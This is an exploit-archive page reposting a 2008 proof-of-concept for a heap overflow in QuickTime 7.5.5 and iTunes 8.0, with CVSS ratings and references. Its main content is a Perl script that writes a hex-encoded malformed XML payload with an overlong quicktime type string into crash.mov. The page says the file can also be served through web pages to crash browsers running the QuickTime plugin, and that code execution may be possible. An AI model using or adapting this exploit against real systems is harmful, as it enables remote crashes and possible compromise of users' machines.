QuickTime 7.5.5 / ITunes 8.0 Remote Heap Overflow Crash Exploit

2008.09.19
Credit: securfrog
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

############################################################################### # Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash # Vendor: http://www.apple.com/ # Risk : high # # The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player. # This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding # to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a # remote crash on firefox, IE and any browser using the Quicktime plugin. # Code execution may be possible. my $payload = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f". "\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d". "\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b". "\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e". "\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f". "\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d". "\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76". "\x65\x72\x22\x20\x2f\x3e\x00"; my $file="crash.mov"; open(my $file, ">>$file") or die "Cannot open $file: $!"; print $file $payload; close($file);

References:

http://www.securityfocus.com/bid/31212
http://www.milw0rm.com/exploits/6471


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top